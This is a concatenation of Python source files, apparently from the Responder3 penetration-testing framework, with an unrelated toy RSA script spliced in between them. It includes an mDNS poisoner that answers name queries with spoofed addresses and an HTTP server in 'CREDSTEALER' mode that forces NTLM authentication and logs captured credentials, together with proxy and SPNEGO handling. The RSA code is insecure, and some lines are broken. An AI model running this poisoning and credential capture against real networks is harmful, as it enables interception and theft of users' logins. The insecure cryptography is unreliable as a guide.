		if len(self.Questions) > 0:
			for question in self.Questions:
				t+= repr(question)

		if len(self.Answers) > 0:
			for answer in self.Answers:
				t+= repr(answer)

		if len(self.Authorities) > 0:
			for answer in self.Authorities:
				t+= repr(answer)

		if len(self.Additionals) > 0:
			for answer in self.Additionals:
				t+= repr(answer)

		return t

	def to_bytes(self):
		t = b''
		t += self.TransactionID

		a  = self.Rcode.value
		a |= (self.FLAGS << 4 ) & 0x7F0
		a |= (self.Opcode.value << 11) & 0x7800
		a |= (self.QR.value << 15) & 0x8000
		t += a.to_bytes(2, byteorder = 'big', signed = False)

		t += self.QDCOUNT.to_bytes(2, byteorder = 'big', signed=False)
		t += self.ANCOUNT.to_bytes(2, byteorder = 'big', signed=False)
		t += self.NSCOUNT.to_bytes(2, byteorder = 'big', signed=False)
		t += self.ARCOUNT.to_bytes(2, byteorder = 'big', signed=False)

		for q in self.Questions:
			t += q.to_bytes()

		for q in self.Answers:
			t += q.to_bytes()

		for q in self.Authorities:
			t += q.to_bytes()

		for q in self.Additionals:
			t += q.to_bytes()

		return t

	def construct(TID, response,  flags = 0, opcode = LLMNROpcode.DEFAULT, rcode = DNSResponseCode.NOERR, 
					questions= [], answers= [], authorities = [], additionals = []):
		
		packet = LLMNRPacket()
		packet.TransactionID = TID
		packet.QR      = response
		packet.Opcode  = opcode
		packet.FLAGS   = flags
		packet.Rcode   = rcode
		packet.QDCOUNT = len(questions)
		packet.ANCOUNT = len(answers)
		packet.NSCOUNT = len(authorities)
		packet.ARCOUNT = len(additionals)

		packet.Questions   = questions
		packet.Answers     = answers
		packet.Authorities = authorities
		packet.Additionals = additionals

		return packet



# https://tools.ietf.org/html/rfc6762
import re
import socket
import struct
import logging
import asyncio
import ipaddress
import traceback

from responder3.core.sockets import setup_base_socket
from responder3.core.commons import PoisonerMode, ResponderPlatform
from responder3.core.udpwrapper import UDPClient
from responder3.protocols.DNS import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession, ResponderServerGlobalSession


class MDNSGlobalSession(ResponderServerGlobalSession):
	def __init__(self, listener_socket_config, settings, log_queue):
		ResponderServerGlobalSession.__init__(self, log_queue, self.__class__.__name__)
		self.listener_socket_config = listener_socket_config
		self.settings = settings

		self.spooftable = []
		self.poisonermode = PoisonerMode.ANALYSE

		self.maddr = ('224.0.0.251' , self.listener_socket_config.bind_port)
		if self.listener_socket_config.bind_addr.version == 6:
			self.maddr = ('FF02::FB' , self.listener_socket_config. bind_port,0, self.listener_socket_config.bind_iface_idx)

		self.parse_settings()

	def parse_settings(self):
		if self.settings is None:
			self.logger.info('No settings defined, adjusting to Analysis functionality!')
		else:
			#parse the poisoner mode
			if isinstance(self.settings['mode'], str):
				self.poisonermode = PoisonerMode[self.settings['mode'].upper()]

			#compiling re strings to actual re objects and converting IP strings to IP objects
			if self.poisonermode == PoisonerMode.SPOOF:
				for exp in self.settings['spooftable']:
					self.spooftable.append((re.compile(exp),ipaddress.ip_address(self.settings['spooftable'][exp])))


class MDNSSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)


class MDNS(ResponderServer):

	@staticmethod
	def custom_socket(socket_config):
		if socket_config.bind_family == 4:
			mcast_addr = ipaddress.ip_address('224.0.0.251')
			sock = setup_base_socket(
				socket_config,
				#bind_ip_override = ipaddress.ip_address('0.0.0.0') #if socket_config.platform == ResponderPlatform.WINDOWS else None
			)
			sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
			mreq = struct.pack("=4sl", mcast_addr.packed, socket.INADDR_ANY)
			sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)		

		else:
			mcast_addr = ipaddress.ip_address('FF02::FB')
			sock = setup_base_socket(
				socket_config,
				bind_ip_override = ipaddress.ip_address('::') if socket_config.platform == ResponderPlatform.WINDOWS else None
			)
			sock.setsockopt(
				41 if socket_config.platform == ResponderPlatform.WINDOWS else socket.IPPROTO_IPV6,
				socket.IPV6_JOIN_GROUP,
				struct.pack('16sI', mcast_addr.packed, socket_config.bind_iface_idx)
			)
			
		return sock

	def init(self):
		self.parser = DNSPacket

	async def parse_message(self):
		msg = await asyncio.wait_for(self.parser.from_streamreader(self.creader), timeout=1)
		return msg

	async def send_data(self, data, addr):
		# we need to set the addr here, because we are sending the packet to the multicast address, not to the clinet itself
		# however there could be cases that the client accepts unicast, but it's ignored for now
		await asyncio.wait_for(self.cwriter.write(data, addr), timeout=1)
		return
	
	async def run(self):
		try:
			msg = await asyncio.wait_for(self.parse_message(), timeout=1)
			if msg.QR == DNSResponse.REQUEST:
				if self.globalsession.poisonermode == PoisonerMode.ANALYSE:
					for q in msg.Questions:
						await self.logger.poisonresult(self.globalsession.poisonermode, requestName = q.QNAME.name, request_type = q.QTYPE.name)
				else:
					answers = []
					for targetRE, ip in self.globalsession.spooftable:
						for q in msg.Questions:
							if q.QTYPE == DNSType.A or q.QTYPE == DNSType.AAAA:
								if targetRE.match(q.QNAME.name):
									await self.logger.poisonresult(self.globalsession.poisonermode, requestName = q.QNAME.name, poisonName = str(targetRE), poisonIP = ip, request_type = q.QTYPE.name)
									#BE AWARE THIS IS NOT CHECKING IF THE QUESTION AS FOR IPV4 OR IPV6!!!
									res = None
									if ip.version == 4 and q.QTYPE == DNSType.A:
										res = DNSAResource.construct(q.QNAME.name, ip)
									elif ip.version == 6 and q.QTYPE == DNSType.AAAA:
										res = DNSAAAAResource.construct(q.QNAME.name, ip)
									else:
										await self.logger.poisonresult(PoisonerMode.ANALYSE, requestName = q.QNAME.name, request_type = q.QTYPE.name)
									#res.construct(q.QNAME, NBRType.NB, ip)
									if res:
										answers.append(res)
								else:
									await self.logger.poisonresult(PoisonerMode.ANALYSE, requestName = q.QNAME.name, request_type = q.QTYPE.name)
					
					response = DNSPacket.construct(TID = b'\x00\x00', 
													 response  = DNSResponse.RESPONSE, 
													 answers   = answers
													 )

					await asyncio.wait_for(self.send_data(response.to_bytes(), self.globalsession.maddr), timeout=1)

		except Exception as e:
			raise e


import random
import math

#https://qiita.com/su_/items/be1a98a2762f898d4159

class RSA():
	plaintext = ""
	ciphertext = []
	_e = _d = _n = 0
	_p = _q = 0
	_l = 0

	def __init__(self):
		pass
	def __del__(self):
		pass

	def set_plaintext(self,str):
		self.plaintext = str

	def _random(self):
		digit = 100
		return random.randrange(10**(digit - 1),10**digit)

	def get_public_key(self):
		return (self._e, self._n)

	def get_private_key(self):
		return (self._d, self._n)

	def get_key_data(self):
		return (self._l, self._p, self._q)

	def _lcm(self,p,q):
		return (p * q) // math.gcd(p, q)


	def _etension_euclid(self,x,y):
		c0, c1 = x, y
		a0, a1 = 1, 0
		b0, b1 = 0, 1

		while c1 != 0:
			 m = c0 % c1
			 q = c0 // c1

			 c0, c1 = c1, m
			 a0, a1 = a1, (a0 - q * a1)
			 b0, b1 = b1, (b0 - q * b1)

		return c0, a0, b0

	def _is_prime_number(self,q):
		cnt = 50

		q = abs(q)
		if q == 2: return True
		if q < 2 or q & 1 == 0: return False

		d = (q - 1) >> 1
		while d & 1 == 0:
			d >>= 1

		for i in range(cnt):
			a = random.randint(1,q - 1)
			t = d
			y = pow(a, t, q)
			while t != q - 1 and y != 1 and y != q - 1: 
				y = pow(y, 2, q)
				t <<= 1
			if y != q - 1 and t & 1 == 0:
				return False
		return True

	def GenerateKey(self,p = 0,q = 0,e = 0,d = 0,n = 0,l = 0):
		if p == 0:
			while True:
				p = self._random()
				if self._is_prime_number(p):break
		self._p = p

		if q == 0:
			while True:
				q = self._random()
				if self._is_prime_number(q) and p != q:break
		self._q = q

		if n == 0:
			n = p * q
		self._n = n

		if l == 0:
			l = self._lcm(p - 1, q  - 1)
		self._l = l

		if e == 0:
			while True:
				i = random.randint(2,l)
				if math.gcd(i, l) == 1:
				  e = i
				  break
		self._e = e

		if d == 0:
			_c, a, _b = self._etension_euclid(e, l)
			d = a % l
		self._d = d
		
	def encrypt_int(self, i):
		return pow(i, self._e,self._n)

	def encryption(self):
		en_str = ""

		for i in map((lambda x: pow(ord(x), self._e,self._n)),list(self.plaintext)):
			self.ciphertext.append(i)
			en_str += str(i)

		return en_str

	def decryption(self):
		cip = []
		de_str = ""
		for i in  list(self.ciphertext):
			tmp = chr(pow(i, self._d,self._n))
			cip.append(tmp)
			de_str += str(tmp)

		return de_str

if __name__ == '__main__':
	rsa = RSA()
	input = input(">>")
	rsa.set_plaintext(input)
	rsa.GenerateKey(0,0,65537)

	l, p, q = rsa.get_key_data()
	e, n = rsa.get_public_key()
	d, _n= rsa.get_private_key()

	print("p = " + str(p))
	print("q = " + str(q))
	print("n = " + str(n))
	print("l = " + str(l))
	print("e = " + str(e))
	print("d = " + str(d))


	en = rsa.encryption()
	de = rsa.decryption()
	print()

	print("C = " + str(en))
	print("P = " + str(de))


import enum
import logging
import asyncio
from urllib.parse import urlparse
import base64

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.HTTP import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession
from responder3.protocols.authentication.loader import *

class HTTPProxy:
	def __init__(self):
		pass
		
class HTTPSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.server_mode = HTTPServerMode.CREDSTEALER
		self.current_state = HTTPState.UNAUTHENTICATED
		self.log_data = False
		self.parser = HTTPRequest

		self.http_version = HTTPVersion.HTTP11
		self.http_content_encoding = HTTPContentEncoding.IDENTITY
		self.http_connect_charset = 'utf8'
		self.auth_mecha = None
		self.auth_mecha_name = None
		self.http_cookie = None
		self.http_server_banner = None

		self.proxy_invisible = False
		self.proxy_ssl_intercept = False
		self.proxy_closed = asyncio.Event()

		self.close_session = asyncio.Event()



	def __repr__(self):
		t  = '== HTTPSession ==\r\n'
		t += 'http_version:      %s\r\n' % repr(self.http_version)
		t += 'http_content_encoding: %s\r\n' % repr(self.http_content_encoding)
		t += 'http_connect_charset: %s\r\n' % repr(self.http_connect_charset)
		t += 'auth_mecha: %s\r\n' % repr(self.auth_mecha)
		t += 'http_cookie:       %s\r\n' % repr(self.http_cookie)
		t += 'http_server_banner: %s\r\n' % repr(self.http_server_banner)
		t += 'mode:     %s\r\n' % repr(self.server_mode)
		t += 'current_state:     %s\r\n' % repr(self.current_state)
		return t


class HTTP(ResponderServer):
	def init(self):
		self.parse_settings()

	def parse_settings(self):
		if self.settings is None:
			# default settings, basically just NTLM auth
			self.session.server_mode = HTTPServerMode.CREDSTEALER
			self.session.auth_mecha_name, self.session.auth_mecha  = AuthMechaLoader.from_dict({'auth_mecha':'NTLM'})

		else:
			if 'mode' in self.settings:
				self.session.server_mode = HTTPServerMode(self.settings['mode'].upper())

			if 'authentication' in self.settings:
				self.session.auth_mecha_name, self.session.auth_mecha = AuthMechaLoader.from_dict(self.settings['authentication'])

	async def parse_message(self, timeout = None):
		try:
			req = await asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout = timeout)
			return req
		except asyncio.TimeoutError:
			await self.log('Timeout!', logging.DEBUG)

	async def send_data(self, data):
		self.cwriter.write(data)
		await self.cwriter.drain()

	async def modify_data(self, data):
		return data

	async def proxy_forwarder(self, reader, writer, laddr, raddr):
		while not self.session.close_session.is_set():
			try:
				data = await asyncio.wait_for(reader.read(1024), timeout=None)
			except asyncio.TimeoutError:
				await self.log('Timeout!', logging.DEBUG)
				self.session.close_session.set()
				break	
			
			if data == b'' or reader.at_eof():
				await self.log('Connection closed!', logging.DEBUG)
				self.session.close_session.set()
				break

			# await self.logProxy('original data: %s' % repr(data), laddr, raddr)
			modified_data = await self.modify_data(data)
			if modified_data != data:
				pass
				# await self.logProxy('modified data: %s' % repr(modified_data),laddr, raddr)
			
			try:
				writer.write(modified_data)
				await asyncio.wait_for(writer.drain(), timeout=1)
			except asyncio.TimeoutError:
				await self.log('Timeout!', logging.DEBUG)
				self.session.close_session.set()
				break
			except OSError as e:
				await self.log('Socket probably got closed!', logging.DEBUG)
				self.session.close_session.set()
				break

		return

	async def httpproxy(self, req):
		# self.session.invisible!!!!

		if req.method == 'CONNECT':
			rhost, rport = req.uri.split(':')
			# https://tools.ietf.org/html/rfc7231#section-4.3.6
			if not self.session.proxy_ssl_intercept:
				# not intercepting SSL traffic, acting as a generic proxy
				try:
					remote_reader, remote_writer = await asyncio.wait_for(asyncio.open_connection(host=rhost, port=int(rport)), timeout=1)
				except Exception as e:
					await self.logger.exception('Failed to create remote connection to %s:%s!' % (rhost, rport))
					return

				# indicating to the client that TCP socket has opened towards the remote host
				await asyncio.wait_for(self.send_data(HTTP200Resp().to_bytes()), timeout = 1)
				self.loop.create_task(self.proxy_forwarder(remote_reader, self.cwriter, '%s:%d' % (rhost,int(rport)), self.session.connection.get_local_address()))
				self.loop.create_task(self.proxy_forwarder(self.creader, remote_writer, self.session.connection.get_local_address(), '%s:%d' % (rhost,int(rport))))
				await asyncio.wait_for(self.session.proxy_closed.wait(), timeout = None)
			
			else:
				print('a')
				while not self.session.close_session.is_set():
					print('aa')
					data = await self.creader.read(-1)
					print('=====request======')
					print(data)

					
					# sending data to remote host
					remote_writer.write(data)
					await remote_writer.drain()

					data_return = await remote_reader.read()
					print('=======response===============')
					print(data_return)

					await asyncio.wait_for(self.send_data(data_return), timeout = 1)

					# req = await asyncio.wait_for(self.parse_message(), timeout = 10)
		
		else:
			while not self.session.close_session.is_set():
				o = urlparse(req.uri)
				if o.netloc.find(':') != -1:
					rhost, rport = o.netloc.split(':')
				else:
					rhost = o.netloc
					rport = 80

				if o.query != '':
					uri = '?'.join([o.path, o.query])
				else:
					uri = o.path

				# removing proxy authorization header
				req.remove_header('proxy-authorization')

				req_new = HTTPRequest.construct(req.method, uri, req.headers, req.body, req.version)
				await self.log('======== request sent ============', logging.DEBUG)
				# print(req_new)

				try:
					remote_reader, remote_writer = await asyncio.wait_for(asyncio.open_connection(host=rhost, port=int(rport)), timeout=1)
				except Exception as e:
					await self.logger.exception()
					return
					

				# sending data to remote host
				remote_writer.write(req_new.to_bytes())
				await remote_writer.drain()

				resp = await asyncio.wait_for(HTTPResponse.from_streamreader(remote_reader), timeout = 1)
				await self.log('=== proxyying response ====', logging.DEBUG)
				await asyncio.wait_for(self.send_data(resp.to_bytes()), timeout = None)

				await self.log('=== PROXY === \r\n %s \r\n %s ======' % (req_new, resp))

				if req.props.connection is not None and req.props.connection == HTTPConnection.KEEP_ALIVE:
					req = await asyncio.wait_for(self.parse_message(timeout = None), timeout = None)
					if req is None:
						self.session.close_session.set()
						return
				else:
					await self.log('Closing connection!', logging.DEBUG)
					self.session.close_session.set()
					remote_writer.close()
					self.cwriter.close()
					return

	@r3trafficlogexception				
	async def run(self):
		while not self.shutdown_evt.is_set() or not self.session.close_session.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				req = result[0]
				
			if self.session.current_state == HTTPState.UNAUTHENTICATED and self.session.auth_mecha is None:
				self.session.current_state = HTTPState.AUTHENTICATED
			
			if self.session.current_state == HTTPState.UNAUTHENTICATED:
				auth_header_key = 'Authorization' if self.session.server_mode != HTTPServerMode.PROXY else 'Proxy-Authorization'
				authline = req.headers.get(auth_header_key)
				authdata = None
				if authline:
					m = authline.find(' ')
					authdata = authline[m+1:]
					if authline and self.session.auth_mecha_name == AuthMecha.NTLM:
						authdata = base64.b64decode(authdata)

				if self.session.auth_mecha_name == AuthMecha.NTLM and authdata is None:
					if self.session.server_mode == HTTPServerMode.PROXY:
						await self.send_data(HTTP407Resp('NTLM').to_bytes())
					else:
						await self.send_data(HTTP401Resp('NTLM').to_bytes())
					continue
				else:
					status, data = self.session.auth_mecha.do_auth(authdata)

				if status == AuthResult.OK or status == AuthResult.FAIL:
					await self.logger.credential(data.to_credential())
				
				if status == AuthResult.OK:
					self.session.current_state = HTTPState.AUTHENTICATED
					if self.session.server_mode == HTTPServerMode.PROXY:
						await self.httpproxy(req)
					else:
						await self.send_data(HTTP200Resp().to_bytes())
						return
				
				elif status == AuthResult.FAIL:
					self.session.current_state = HTTPState.AUTHFAILED
					await self.send_data(HTTP403Resp('Auth failed!').to_bytes())
					return
				
				elif status == AuthResult.CONTINUE:
					rdata = self.session.auth_mecha_name.name
					if data is not None:
						if self.session.auth_mecha_name == AuthMecha.NTLM:
							rdata += ' %s' % base64.b64encode(data).decode()
						else:
							rdata += ' %s' % data
					
					if self.session.server_mode == HTTPServerMode.PROXY:
						await self.send_data(HTTP407Resp(rdata).to_bytes())
					else:
						await self.send_data(HTTP401Resp(rdata).to_bytes())
					continue


import json
import enum

from responder3.core.commons import *

class R3ClientCommsClass:
	def to_dict(self):
		t = {}
		t['cmd_id'] = r3cli2cmd_inv[type(self)].value
		
		for name in self.__dict__:
			t[name] = getattr(self, name)
		return t
		
	def from_dict(self, d):
		for name in self.__dict__:
			setattr(self, name, d[name])

		self.cmd_id = R3ClientCommand(d['cmd_id'])

	def from_json(self, data):
		self.to_dict(json.loads(data))
		
	def to_json(self):
		return json.dumps(self.to_dict(), cls=UniversalEncoder)
		
class R3ClientCommsClassLoader:
	def __init__(self):
		self.cmdtype_enum = R3ClientCommand
		self.lookup_table = r3cli2cmd #cmdid -> object
		
	def from_dict(self, d):
		obj = self.lookup_table[self.cmdtype_enum(d['cmd_id'])]()
		obj.from_dict(d)
		return obj
		
	def from_json(self, data):
		return self.from_dict(json.loads(data))
		

class R3ClientCommand(enum.Enum):
	SHUTDOWN = 0
	STOP_SERVER = 1
	STOP_SERVER_RPLY = 2
	LIST_SERVERS = 3
	LIST_SERVERS_RPLY = 4
	CREATE_SERVER = 5
	CREATE_SERVER_RPLY = 6
	LOG = 7
	LIST_INTERFACES = 8
	LIST_INTERFACES_RPLY = 9
	
class R3CliShutdownCmd(R3ClientCommsClass):
	pass
	
class R3CliServerStopCmd(R3ClientCommsClass):
	def __init__(self, server_id = None):
		self.server_id = server_id
	
class R3CliServerStopRply(R3ClientCommsClass):
	def __init__(self, remote_ip = None, remote_port = None, status = None):
		self.remote_ip = remote_ip
		self.remote_port = remote_port
		self.status = status
	
class R3CliListServersCmd(R3ClientCommsClass):
	pass
	
class R3CliListServersRply(R3ClientCommsClass):
	def __init__(self, remote_ip = None, remote_port = None, servers = None):
		self.remote_ip = remote_ip
		self.remote_port = remote_port
		self.servers = servers
	
class R3CliCreateServerCmd(R3ClientCommsClass):
	def __init__(self, server_config = None):
		self.server_config = server_config
	
class R3CliCreateServerRply(R3ClientCommsClass):
	def __init__(self, remote_ip = None, remote_port = None, server_id = None, status = None):
		self.remote_ip = remote_ip
		self.remote_port = remote_port
		self.server_id = server_id
		self.status = data
		
class R3CliLog(R3ClientCommsClass):
	def __init__(self, remote_ip = None, remote_port = None, log_obj_type = None, log_obj = None):
		self.remote_ip = remote_ip
		self.remote_port = remote_port
		self.log_obj_type = log_obj_type
		self.log_obj = log_obj

class R3CliListInterfacesCmd(R3ClientCommsClass):
	pass

class R3CliListInterfacesRply(R3ClientCommsClass):
	def __init__(self, remote_ip = None, remote_port = None, interfaces = None):
		self.remote_ip = remote_ip
		self.remote_port = remote_port
		self.interfaces = interfaces
		
r3cli2cmd = {
	R3ClientCommand.SHUTDOWN : R3CliShutdownCmd,
	R3ClientCommand.STOP_SERVER : R3CliServerStopCmd,
	R3ClientCommand.STOP_SERVER_RPLY : R3CliServerStopRply,
	R3ClientCommand.LIST_SERVERS : R3CliListServersCmd,
	R3ClientCommand.LIST_SERVERS_RPLY : R3CliListServersRply,
	R3ClientCommand.CREATE_SERVER : R3CliCreateServerCmd,
	R3ClientCommand.CREATE_SERVER_RPLY : R3CliCreateServerRply,
	R3ClientCommand.LOG : R3CliLog,
	R3ClientCommand.LIST_INTERFACES : R3CliListInterfacesCmd,
	R3ClientCommand.LIST_INTERFACES_RPLY : R3CliListInterfacesRply,
}

r3cli2cmd_inv = {v: k for k, v in r3cli2cmd.items()}



import pprint
from asn1crypto.core import ObjectIdentifier,Choice, Any, SequenceOf, BitString, Sequence, GeneralString, OctetString, Enumerated
from responder3.protocols.authentication.NTLM import *
from responder3.protocols.authentication.common import *

##Meterial used:
##https://msdn.microsoft.com/en-us/library/cc247039.aspx
##http://www.rfc-editor.org/rfc/rfc4178.txt

##ASN1 parsing libray: asn1crypto
##docu: https://github.com/wbond/asn1crypto/blob/master/docs/universal_types.md
#memo
#only use explicit key with (class, tag) tuple!

##class options: 
"""
CLASS_NUM_TO_NAME_MAP = {
    0: 'universal',
    1: 'application',
    2: 'context',
    3: 'private',
}
"""
##



class MechType(ObjectIdentifier):
	_map = { 
		#'': 'SNMPv2-SMI::enterprises.311.2.2.30',
		'1.3.6.1.4.1.311.2.2.10': 'NTLMSSP - Microsoft NTLM Security Support Provider',
		'1.2.840.48018.1.2.2'   : 'MS KRB5 - Microsoft Kerberos 5',
		'1.2.840.113554.1.2.2'  : 'KRB5 - Kerberos 5',
		'1.2.840.113554.1.2.2.3': 'KRB5 - Kerberos 5 - User to User',
		'1.3.6.1.4.1.311.2.2.30': 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism',
	}

class MechTypes(SequenceOf):
	_child_spec = MechType

class ContextFlags(BitString):
	_map = {
		0: 'delegFlag',
		1: 'mutualFlag',
		2: 'replayFlag',
		3: 'sequenceFlag',
		4: 'anonFlag',
		5: 'confFlag',
		6: 'integFlag',
	}

class NegHints(Sequence):
	_fields = [
		('hintName', GeneralString, {'explicit': 0, 'optional': True}),
		('hintAddress', OctetString, {'explicit': 1, 'optional': True}),
]
 

class NegTokenInit2(Sequence):
	class_ = 2
	tag = 0
	
	_fields = [
		('mechTypes', MechTypes, {'explicit': 0,'optional': True}),
		('reqFlags', ContextFlags, {'explicit': 1 ,'optional': True}),
		('mechToken', OctetString, {'explicit': 2 ,'optional': True,}),
		('negHints', NegHints, {'explicit': 3 ,'optional': True}),
		('mechListMIC', OctetString, {'explicit': 4 ,'optional': True}),
]


class negState(Enumerated):
	_map = {
		0: 'accept-completed',
		1: 'accept-incomplete',
		2: 'reject',
		3: 'request-mic',
	}

class negTokenResp(Sequence):
	_fields = [
		('negState', negState, {'explicit': 0,'optional': True}),
		('supportedMech', MechType, {'explicit': 1, 'optional': True}),
		('responseToken', OctetString, {'explicit': 2, 'optional': True}),
		('mechListMIC', OctetString, {'explicit': 3,'optional': True}),
]

class NegotiationToken(Choice):
	_alternatives = [
		#('NegTokenInit2', NegTokenInit2, {'implicit': (0,16) }  ), #NegTokenInit2 the '2' in the name is because Microsoft added modifications to the original rfc :)
		('NegTokenInit2', NegTokenInit2, {'implicit': (0,16) }  ), #NegTokenInit2 the '2' in the name is because Microsoft added modifications to the original rfc :)
		('negTokenResp', negTokenResp, {'explicit': (2,1) } ),
		
	]

class SPNEGO(Sequence):
	class_ = 2
	tag    = 0

	_fields = [
		('NegotiationToken', NegotiationToken),
]

class GSSType(ObjectIdentifier):
	_map = { 
		#'': 'SNMPv2-SMI::enterprises.311.2.2.30',
		'1.3.6.1.5.5.2': 'SPNEGO',
	}

class GSSAPI(Sequence):
	class_ = 1
	tag    = 0

	_fields = [
		('type', GSSType, {'optional': False}),
		('value', Any, {'optional': False}),
	]

	_oid_pair = ('type', 'value')
	_oid_specs = {
		'SPNEGO': SPNEGO,
	}

class GSSAPIAuthHandler():
	def __init__(self, auth_settings = None):
		self.auth_handler_settings = auth_settings
		self.supported_authtypes = None
		self.common_authtypes = None
		self.chosen_authtype = None
		self.authHandler = None
		self.negTokenInit = None
		self.negTokenResp_server = None
		self.negTokenResp = None
		self.app = None

	def do_auth(self, asn1_blob = None, smbv1 = False):

		if asn1_blob is None:
			self.negTokenInit = {}
			self.negTokenInit['mechTypes'] = [MechType('1.3.6.1.4.1.311.2.2.10')]
				
			"""
			if smbv1 == True:
				self.negTokenInit['negHints']  = NegHints({'hintName': 'testserver@testdomain.local', 'hintAddress':b'bela'})
			else:
				self.negTokenInit['negHints']  = NegHints({'hintName': 'testserver@testdomain.local'})
			"""
			#self.negTokenInit['negHints']  = NegHints({'hintName': 'not_defined_in_RFC4178@please_ignore', 'hintAddress':b'bela'})
			self.negTokenInit['negHints']  = NegHints({'hintName': 'not_defined_in_RFC4178@please_ignore'})
			#self.negTokenInit['negHints']  = NegHints({'hintName': 'not_defined_in_RFC4178@please_ignore'})
			

			self.aaa = NegotiationToken({'NegTokenInit2':self.negTokenInit})

			spnego = SPNEGO({'NegotiationToken':self.aaa})

			self.app = GSSAPI({'type': GSSType('1.3.6.1.5.5.2'), 'value':spnego})
			
			#self.app.debug()
			#pprint.pprint(self.app)
			return (None, self.app.dump(), None)
		
		else:
			if self.negTokenResp_server is None:
				self.app = GSSAPI.load(asn1_blob)
				#print(self.app.native['value']['NegotiationToken']['mechTypes'][0])
				#print(self.app.native['value']['NegotiationToken']['mechTypes'])

				if self.app.native['value']['NegotiationToken']['mechTypes'][0] == 'NTLMSSP - Microsoft NTLM Security Support Provider':
					self.authHandler = NTLMAUTHHandler()
					if self.auth_handler_settings and 'NTLM' in self.auth_handler_settings:
						self.authHandler.setup(self.auth_handler_settings['NTLM'])
					else:
						self.authHandler.setup_defaults()
				else:
					raise Exception('Unknown GSSAPI authentication type')

				status, responseData = self.authHandler.do_auth(self.app.native['value']['NegotiationToken']['mechToken'])
				print(responseData)

				self.negTokenResp_server = {}
				self.negTokenResp_server['negState'] = negState(1)
				self.negTokenResp_server['responseToken']  = responseData

				t = NegotiationToken({'negTokenResp':negTokenResp(self.negTokenResp_server)})

				#spnego = SPNEGO({'NegotiationToken': t})

				return (status, t.dump(), None)

			else:
				self.negTokenResp = NegotiationToken.load(asn1_blob)

				status, data = self.authHandler.do_auth(self.negTokenResp.native['responseToken'])

				# TODO: currently it sends back static, but it's not good!
				t = NegotiationToken({'negTokenResp': negTokenResp({'negState':  negState(0)})})

				return (status, t.dump(), data)


import io
import os
import enum
import zlib
import gzip
import base64
import asyncio
import collections

from responder3.core.commons import *
from responder3.core.logging.log_objects import Credential
from responder3.core.asyncio_helpers import *
#from responder3.protocols.NTLM import NTLMAUTHHandler
#from responder3.protocols.SMB.ntstatus import *


class HTTPConnection(enum.Enum):
	CLOSE = 'close'
	KEEP_ALIVE = 'keep-alive'


class HTTPVersion(enum.Enum):
	HTTP10 = 'HTTP/1.0'
	HTTP11 = 'HTTP/1.1'


class HTTPState(enum.Enum):
	UNAUTHENTICATED = enum.auto()
	AUTHENTICATED   = enum.auto()
	AUTHFAILED      = enum.auto()


class HTTPAuthType(enum.Enum):
	BASIC = enum.auto()
	NTLM  = enum.auto()


class HTTPContentEncoding(enum.Enum):
	IDENTITY = enum.auto()
	GZIP     = enum.auto()
	COMPRESS = enum.auto()
	DEFLATE  = enum.auto()
	BR       = enum.auto()


HTTPResponseReasons = {
	100 : 'Continue',
	101 : 'Switching Protocols',
	200 : 'OK',
	201 : 'Created',
	202 : 'Accepted',
	203 : 'Non-Authoritative Information',
	204 : 'No Content',
	205 : 'Reset Content',
	206 : 'Partial Content',
	300 : 'Multiple Choices',
	301 : 'Moved Permanently',
	302 : 'Found',
	303 : 'See Other',
	304 : 'Not Modified',
	305 : 'Use Proxy',
	307 : 'Temporary Redirect',
	400 : 'Bad Request',
	401 : 'Unauthorized',
	402 : 'Payment Required',
	403 : 'Forbidden',
	404 : 'Not Found',
	405 : 'Method Not Allowed',
	406 : 'Not Acceptable',
	407 : 'Proxy Authentication Required',
	408 : 'Request Time-out',
	409 : 'Conflict',
	410 : 'Gone',
	411 : 'Length Required',
	412 : 'Precondition Failed',
	413 : 'Request Entity Too Large',
	414 : 'Request-URI Too Large',
	415 : 'Unsupported Media Type',
	416 : 'Requested range not satisfiable',
	417 : 'Expectation Failed',
	500 : 'Internal Server Error',
	501 : 'Not Implemented',
	502 : 'Bad Gateway',
	503 : 'Service Unavailable',
	504 : 'Gateway Time-out',
	505 : 'HTTP Version not supported',

}


def decompress_body(req_resp, modify_internal = False):
	tbuff = None
	if req_resp.props.content_encoding == HTTPContentEncoding.IDENTITY:
		tbuff = req_resp.body

	elif req_resp.props.content_encoding == HTTPContentEncoding.GZIP:
		tbuff = gzip.decompress(req_resp.body)

	elif req_resp.props.content_encoding == HTTPContentEncoding.COMPRESS:
		raise Exception('Not Implemented!')

	elif req_resp.props.content_encoding == HTTPContentEncoding.DEFLATE:
		tbuff = zlib.decompress(req_resp.body)
		
	elif req_resp.props.content_encoding == HTTPContentEncoding.BR:
		raise Exception('Not Implemented!')

	else:
		raise Exception('Encoding format not recognized!')

	if modify_internal:
		req_resp.body = tbuff
	else:
		return tbuff

def compress_body(req_resp, modify_internal = False):
	tbuff = None
	if req_resp.props.content_encoding is not None:
		if req_resp.props.content_encoding == HTTPContentEncoding.IDENTITY:
			tbuff = req_resp.body
			
		elif req_resp.props.content_encoding == HTTPContentEncoding.GZIP:
			tbuff = gzip.compress(req_resp.body)

		elif req_resp.props.content_encoding == HTTPContentEncoding.COMPRESS:
			raise Exception('COMPRESS Not Implemented!')

		elif req_resp.props.content_encoding == HTTPContentEncoding.DEFLATE:
			tbuff = zlib.compress(req_resp.body)

		elif req_resp.props.content_encoding == HTTPContentEncoding.BR:
			raise Exception('BR Not Implemented!')
		else:
			raise Exception('Encoding format not recognized!')

	else:
		tbuff = req_resp.body

	if modify_internal:
		req_resp.body = tbuff
	else:
		return tbuff


class HTTPRequestProps:
	def __init__(self):
		self.content_length = None
		self.content_encoding = None
		self.connection = None
		self.encoding = None
		self.compression = None

